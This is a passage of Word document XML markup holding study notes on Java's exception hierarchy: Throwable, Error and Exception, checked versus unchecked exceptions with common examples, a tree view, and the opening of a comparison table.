      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.Throwable  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CF9B8"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↳</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.Error  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44F457"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↳</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.Exception  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E880B"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↳</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.RuntimeException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95F10D" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B4E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8DFC453">
          <v:rect id="_x0000_i1598" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D5E83" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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1. Throwable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542F7273" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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root class for all errors and exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B467BB9" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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wo main subclasses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0528CC" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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rror</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FAE39D" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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ception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFADF24" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B4E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B7B761F">
          <v:rect id="_x0000_i1599" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F5181" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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2. Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F68B38" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Represents serious issues that a typical application </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>should not catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7247B683" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Mostly related to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or system failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431B142" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169F995" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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utOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998A358" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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ckOverflowError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF351F" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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irtualMachineError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565AB0C" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B4E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A6F7887">
          <v:rect id="_x0000_i1600" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="185FBB76" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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3. Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA75803" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Represents conditions that an application </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>might want to catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE84321" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ivided into two categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264333C" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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hecked Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E745E" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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nchecked Exceptions (RuntimeExceptions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A92FF61" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B4E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16F90C9">
          <v:rect id="_x0000_i1601" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C2625" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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a. Checked Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3047AA" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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hecked at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compile-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39FFB9" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>must handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them using try-catch or declare with throws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65145A89" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E21D33" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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OException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758708C9" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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QLException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5869105D" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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arseException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A597AD" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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NotFoundException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8A428" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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b. Unchecked Exceptions (RuntimeException)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E8A58" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ccur at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E1675" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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t checked at compile time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41003ABB" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ually due to programming mistakes like invalid logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9E290" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D584DC" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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ullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77569787" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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rayIndexOutOfBoundsException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50000B4F" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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ithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBEAA72" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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llegalArgumentException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D9B9A" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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CastException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6721AA" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B4E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0123C46">
          <v:rect id="_x0000_i1602" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75832B81" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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Tree View:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4428EF45"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rowable  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71700A32"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── Error  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72442216"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── OutOfMemoryError  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADCA4FF"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tackOverflowError  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB29FFB"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8B035C1"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xception  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0AF139"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── IOException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4F5D2"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   └── FileNotFoundException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE7322A"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── SQLException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C238F"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── ParseException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D2EE5"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RuntimeException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACCA1A"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── NullPointerException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D22927"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── ArrayIndexOutOfBoundsException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81919C"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">── ArithmeticException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC02B5"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IllegalArgumentException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0CF77" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B4E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69F0752">
          <v:rect id="_x0000_i1603" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3EFDC" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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3"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="2480"/>
        <w:gridCol w:w="3894"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="56158E74" w14:textId="77777777" w:rsidTr="006C0087">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B75866A" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76B272E3" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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hecked?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36EE5B43" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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andle/Declare Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712FE949" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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mon Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
